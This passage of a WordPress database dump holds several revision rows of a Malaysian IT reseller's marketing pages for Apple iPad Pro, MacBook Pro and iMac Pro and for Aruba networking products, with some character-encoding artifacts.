or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li><strong>iPad Pro has great apps you\'ll use everyday --Â </strong>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n 	<li><strong>It\'s made to protect your privacy --Â </strong>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n 	<li><strong>Has a place for your files and a way to get to them from all your devices --Â </strong>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want.</li>\r\n</ul>\r\n<h3>Â MACBOOK PRO</h3>\r\n<img class=\"alignnone wp-image-2404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/macbook-pro.jpg\" alt=\"\" width=\"220\" height=\"205\" />\r\n\r\n&nbsp;\r\n<h4 class=\"typography-headline-elevated\" data-reveal-group=\"1\">More power. More performance. More pro.</h4>\r\n<ul>\r\n 	<li>New eighth-generation Intel 6â€‘core and quad-core processors</li>\r\n 	<li>Up to 32GB of memory for running multiple pro apps</li>\r\n 	<li>Stunning Retina display with True Tone technology</li>\r\n 	<li>Touch Bar for working more productively</li>\r\n</ul>\r\n<h3>iMAC PRO</h3>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2405\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/imac-pro.jpg\" alt=\"\" width=\"220\" height=\"220\" />\r\n<h4 class=\"hero-subheadline columns large-12 center\">Power to theÂ pro.</h4>\r\n<p class=\"label large-10 small-12 center\">Pros love iMac. So we created one just for you. Itâ€™s packed with the most powerful graphics and processors ever in a Mac, along with the most advanced storage, memory and I/O â€” all behind a breathtaking Retina 5K display in a sleek, all-in-one design. For everyone from photographers to video editors to 3D animators to musicians to software developers to scientists, iMac Pro is ready toÂ turn your biggest ideas into your greatestÂ work.</p>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Apple','','inherit','closed','closed','','1439-revision-v1','','','2019-09-18 15:36:05','2019-09-18 07:36:05','',1439,'https://bintara.com.my/blog/2019/09/18/1439-revision-v1/',0,'revision','',0),(3186,1,'2019-09-18 15:36:57','2019-09-18 07:36:57','<h3 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h3>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n\r\n&nbsp;\r\n\r\n<h3>iPAD PRO</h3>\r\n<img class=\"alignnone wp-image-2403\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipad-pro.png\" alt=\"\" width=\"217\" height=\"257\" />\r\n<h4>Why iPadÂ Pro</h4>\r\n<ul>\r\n 	<li><strong>iPad Pro does what a computer does but more in intuitive way --</strong> Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li><strong>Works like your iPhone, so it\'s similar to use --</strong> iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li><strong>iPad Pro works with a keyboard when you need one --Â </strong>The full-sized onscreen keyboard lets you respond to an email or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li><strong>iPad Pro has great apps you\'ll use everyday --Â </strong>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n 	<li><strong>It\'s made to protect your privacy --Â </strong>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n 	<li><strong>Has a place for your files and a way to get to them from all your devices --Â </strong>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want.</li>\r\n</ul>\r\n\r\n&nbsp;\r\n\r\n<h3>Â MACBOOK PRO</h3>\r\n<img class=\"alignnone wp-image-2404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/macbook-pro.jpg\" alt=\"\" width=\"220\" height=\"205\" />\r\n\r\n&nbsp;\r\n<h4 class=\"typography-headline-elevated\" data-reveal-group=\"1\">More power. More performance. More pro.</h4>\r\n<ul>\r\n 	<li>New eighth-generation Intel 6â€‘core and quad-core processors</li>\r\n 	<li>Up to 32GB of memory for running multiple pro apps</li>\r\n 	<li>Stunning Retina display with True Tone technology</li>\r\n 	<li>Touch Bar for working more productively</li>\r\n</ul>\r\n\r\n&nbsp;\r\n\r\n<h3>iMAC PRO</h3>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2405\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/imac-pro.jpg\" alt=\"\" width=\"220\" height=\"220\" />\r\n<h4 class=\"hero-subheadline columns large-12 center\">Power to theÂ pro.</h4>\r\n<p class=\"label large-10 small-12 center\">Pros love iMac. So we created one just for you. Itâ€™s packed with the most powerful graphics and processors ever in a Mac, along with the most advanced storage, memory and I/O â€” all behind a breathtaking Retina 5K display in a sleek, all-in-one design. For everyone from photographers to video editors to 3D animators to musicians to software developers to scientists, iMac Pro is ready toÂ turn your biggest ideas into your greatestÂ work.</p>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Apple','','inherit','closed','closed','','1439-revision-v1','','','2019-09-18 15:36:57','2019-09-18 07:36:57','',1439,'https://bintara.com.my/blog/2019/09/18/1439-revision-v1/',0,'revision','',0),(3187,1,'2019-09-18 15:37:29','2019-09-18 07:37:29','<h3 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h3>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n\r\n&nbsp;\r\n\r\n<h3>iPAD PRO</h3>\r\n<img class=\"alignnone wp-image-2403\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipad-pro.png\" alt=\"\" width=\"217\" height=\"257\" />\r\n<h4>Why iPadÂ Pro</h4>\r\n<ul>\r\n 	<li><strong>iPad Pro does what a computer does but more in intuitive way --</strong> Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li><strong>Works like your iPhone, so it\'s similar to use --</strong> iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li><strong>iPad Pro works with a keyboard when you need one --Â </strong>The full-sized onscreen keyboard lets you respond to an email or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li><strong>iPad Pro has great apps you\'ll use everyday --Â </strong>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n 	<li><strong>It\'s made to protect your privacy --Â </strong>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n 	<li><strong>Has a place for your files and a way to get to them from all your devices --Â </strong>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want.</li>\r\n</ul>\r\n\r\n&nbsp;\r\n\r\n<h3>Â MACBOOK PRO</h3>\r\n<img class=\"alignnone wp-image-2404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/macbook-pro.jpg\" alt=\"\" width=\"220\" height=\"205\" />\r\n\r\n&nbsp;\r\n<h4 class=\"typography-headline-elevated\" data-reveal-group=\"1\">More power. More performance. More pro.</h4>\r\n<ul>\r\n 	<li>New eighth-generation Intel 6â€‘core and quad-core processors</li>\r\n 	<li>Up to 32GB of memory for running multiple pro apps</li>\r\n 	<li>Stunning Retina display with True Tone technology</li>\r\n 	<li>Touch Bar for working more productively</li>\r\n</ul>\r\n\r\n&nbsp;\r\n\r\n<h3>iMAC PRO</h3>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2405\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/imac-pro.jpg\" alt=\"\" width=\"220\" height=\"220\" />\r\n<h4 class=\"hero-subheadline columns large-12 center\">Power to theÂ pro.</h4>\r\n<p class=\"label large-10 small-12 center\">Pros love iMac. So we created one just for you. Itâ€™s packed with the most powerful graphics and processors ever in a Mac, along with the most advanced storage, memory and I/O â€” all behind a breathtaking Retina 5K display in a sleek, all-in-one design. For everyone from photographers to video editors to 3D animators to musicians to software developers to scientists, iMac Pro is ready toÂ turn your biggest ideas into your greatestÂ work.</p>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Apple','','inherit','closed','closed','','1439-revision-v1','','','2019-09-18 15:37:29','2019-09-18 07:37:29','',1439,'https://bintara.com.my/blog/2019/09/18/1439-revision-v1/',0,'revision','',0),(3188,1,'2019-09-18 16:05:28','2019-09-18 08:05:28','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\n\n<div class=\"subheadline\">\n\n<h3>Smarter solutions for experience-driven networking.</h3>\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\n\n&nbsp;\n<h3>Wireless access you can always count on.</h3>\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\n\n&nbsp;\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\n\n</div>\n\n&nbsp;\n<h3>Visibility and control for your WAN.</h3>\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\n&nbsp;\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\n\n&nbsp;\n<h3>Protect your organization, from inside and out.</h3>\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\n\n&nbsp;\n<h3>Centralized network operations.</h3>\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\n\n&nbsp;\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\n\n<center<[maxbutton id=\"1\" ]</center>','Aruba','','inherit','closed','closed','','1440-autosave-v1','','','2019-09-18 16:05:28','2019-09-18 08:05:28','',1440,'https://bintara.com.my/blog/2019/09/18/1440-autosave-v1/',0,'revision','',0),(3191,1,'2019-09-18 15:54:32','2019-09-18 07:54:32','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n<div class=\"subheadline\">\r\n<h2>Smarter solutions for experience-driven networking.</h2>\r\n\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n[maxbutton id=\"1\" ]','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2019-09-18 15:54:32','2019-09-18 07:54:32','',1440,'https://bintara.com.my/blog/2019/09/18/1440-revision-v1/',0,'revision','',0),(3189,1,'2019-09-18 15:53:08','2019-09-18 07:53:08','<h2 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h2>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n<div class=\"subheadline\">\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<h3></h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n[maxbutton id=\"1\" ]','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2019-09-18 15:53:08','2019-09-18 07:53:08','',1440,'https://bintara.com.my/blog/2019/09/18/1440-revision-v1/',0,'revision','',0),(3190,1,'2019-09-18 15:53:50','2019-09-18 07:53:50','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n<div class=\"subheadline\">\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<h3></h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n[maxbutton id=\"1\" ]','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2019-09-18 15:53:50','2019-09-18 07:53:50','',1440,'https://bintara.com.my/blog/2019/09/18/1440-revision-v1/',0,'revision','',0),(3192,1,'2019-09-18 15:55:40','2019-09-18 07:55:40','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n\r\n<div class=\"subheadline\">\r\n\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n[maxbutton id=\"1\" ]','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2019-09-18 15:55:40','2019-09-18 07:55:40','',1440,'https://bintara.com.my/blog/2019/09/18/1440-revision-v1/',0,'revision','',0),(3193,1,'2019-09-18 16:02:01','2019-09-18 08:02:01','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n\r\n<div class=\"subheadline\">\r\n\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" 